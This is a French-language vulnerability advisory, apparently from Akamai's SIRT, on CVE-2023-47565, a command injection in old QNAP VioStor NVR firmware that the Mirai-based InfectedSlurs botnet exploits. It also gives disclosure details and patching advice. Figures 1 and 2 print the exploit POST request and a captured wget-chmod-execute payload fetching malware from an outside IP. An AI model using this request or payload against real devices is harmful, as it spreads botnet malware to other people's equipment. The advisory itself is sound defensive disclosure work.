Vulnérabilité activement exploitée dans les enregistreurs vidéo en réseau VioStor de QNAP : corrigée, correctifs disponibles
Synthèse
L'équipe SIRT (Security Intelligence Response Team) d'Akamai a publié une mise à jour supplémentaire pour la série de conseils sur InfectedSlurs, à présent que des informations et des conseils ont été publiés par l'un des fournisseurs affectés.
La vulnérabilité dans QNAP a été identifiée « in the wild » et a reçu l'ID CVE CVE-2023-47565 avec un score CVSS v3 de 8,0.
Les charges utiles malveillantes capturées « in the wild » installent un logiciel malveillant basé sur Mirai, avec l'intention de créer un botnet DDoS (déni de service distribué) .
Nous avons fourni une longue liste d'indicateurs de compromission (IOC), de règles Snort et de règles YARA dans la recherche originale, pour aider à identifier ces tentatives d'exploitation « in the wild » et possibles infections actives sur les réseaux de défenseurs.
À savoir
Dans le cadre de la recherche concernant InfectedSlurs, l'équipe SIRT a identifié une vulnérabilité dans les enregistreurs vidéo en réseau VioStor de QNAP qui est activement exploitée « in the wild ». L'enregistreur vidéo en réseau est une solution de surveillance réseau haute performance pour la surveillance en réseau des caméras IP, de l'enregistrement vidéo, de la lecture et de l'accès aux données à distance. La vulnérabilité a reçu l'ID CVE CVE-2023-47565 avec un score CVSS v3 de 8,0.
Cette vulnérabilité permet à un attaquant authentifié de réaliser une injection de commande du système d'exploitation avec une charge utile fournie via une requête POST à l'interface de gestion. Dans sa configuration actuelle, elle utilise les informations d'identification par défaut du terminal dans les charges utiles capturées.
Les versions suivantes du micrologiciel du NVR VioStor de QNAP sont concernées :
NVR VioStor : Versions 5.0.0 et antérieures (5.0.0 publiée le 21 juin 2014)
QNAP considère que ces terminaux ne sont plus pris en charge. Toutefois, le fournisseur recommande une mise à niveau du micrologiciel VioStor vers la dernière version disponible sur les terminaux existants. Ce problème avait déjà été corrigé, bien qu'il n'ait jamais été signalé/divulgué publiquement. En outre, il est recommandé aux utilisateurs de modifier les mots de passe par défaut sur leurs terminaux.
De plus, US-CERT a publié un avis.
Exploitation observée
Au départ, lorsque nous avons examiné les charges utiles d'exploitation lors de la campagne InfectedSlurs, nous n'avions signalé que deux vulnérabilités Zero Day, car l'équipe n'était pas en mesure d'associer l'exploitation observée à un terminal ou à un fabricant. Il était donc difficile de confirmer que l'exploitation était bien de type Zero Day.
Suite à un examen plus approfondi de divers aspects de l'exploitation et de la charge utile, l'équipe SIRT a estimé que les terminaux NVR VioStor de QNAP étaient la cible. Ces terminaux correspondent au profil de ciblage de la campagne et ont été vendus avec des identifiants de connexion par défaut faibles (trouvés dans leurs manuels et observés dans le cadre de l'exploitation). Comme pour les deux premières vulnérabilités Zero Day, les terminaux infectés pourraient faciliter les vulnérabilités d'injection de commande du système d'exploitation dans les paramètres NTP sur les terminaux Internet des objets (IoT) et les NVR affectés.
Ces théories ont été relayées à l'US-CERT, qui s'est alors coordonné avec l'équipe SIRT d'Akamai et QNAP afin d'examiner les preuves et d'aider à confirmer les théories de l'équipe SIRT. Au final, QNAP a confirmé que les charges utiles ciblaient ses terminaux VioStor (lesquels ont fait l'objet d'un retrait et ne sont désormais plus pris en charge), mais uniquement ceux possédant les anciennes versions (5.0.0 ou antérieures) de leur micrologiciel.
Cette vulnérabilité est exploitée par le biais d'une requête POST sur le chemin /cgi-bin/server/server.cgi . L'exécution de code à distance (RCE) existe là où l'argument pour SPECIFIC_SERVER est spécifié (Figure 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
Figure 1 : Tentative d'exploitation du RCE par injection de commande
Un exemple de charge utile d'infection capturée est présenté dans la figure 2.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
Figure 2 : Charge utile RCE capturée
Importance des pratiques de sécurité de base
Les bases comptent. Ces observations soulignent une fois de plus l'importance des meilleures pratiques en matière de sécurité de base, telles que la modification des mots de passe par défaut sur les terminaux lors de la configuration initiale. Elles mettent également en évidence l'importance de mettre en œuvre des protocoles de sécurité proactifs à long terme encore plus solides, comme assurer une mise à jour cohérente des systèmes pour se protéger contre les attaques potentielles et vérifier de temps à autre les systèmes/terminaux, surtout s'ils présentent un comportement étrange.
Conclusion
Une fois de plus, notre déploiement d'un réseau de leurre personnalisé a permis d'obtenir des informations précieuses sur les cyberattaques, révélant des vulnérabilités inconnues auparavant. La présence d'identifiants de connexion par défaut et de systèmes réseau obsolètes et non pris en charge est apparue comme une aubaine pour les infections botnet. Les systèmes hérités constituent un terrain propice pour la découverte et l'exploitation de nouvelles vulnérabilités afin d'y propager des logiciels malveillants.
Ce constat souligne l'importance cruciale de renforcer la sensibilisation et la formation concernant les meilleures pratiques de l'IoT, en insistant sur les risques associés pour l'internaute moyen. Le besoin de sensibilisation s'étend au-delà des internautes et s'applique également aux fabricants de ces terminaux. Des cycles de support logiciel plus longs et la sécurité lors de la configuration, comme des changements forcés de mots de passe, sont essentiels pour maintenir la sécurité du système.
Restez à l'écoute
Le groupe Security Intelligence d'Akamai continuera à surveiller ces menaces et à les signaler afin de sensibiliser nos clients et la communauté en général. Pour accéder à d'autres recherches, suivez-nous sur X(ex-Twitter) pour connaître les dernières actualités.
L'équipe SIRT d'Akamai souhaite remercier CISA, US-CERT et QNAP pour leur assistance dans les efforts de communication, de coordination, d'identification, de correction et de divulgation.
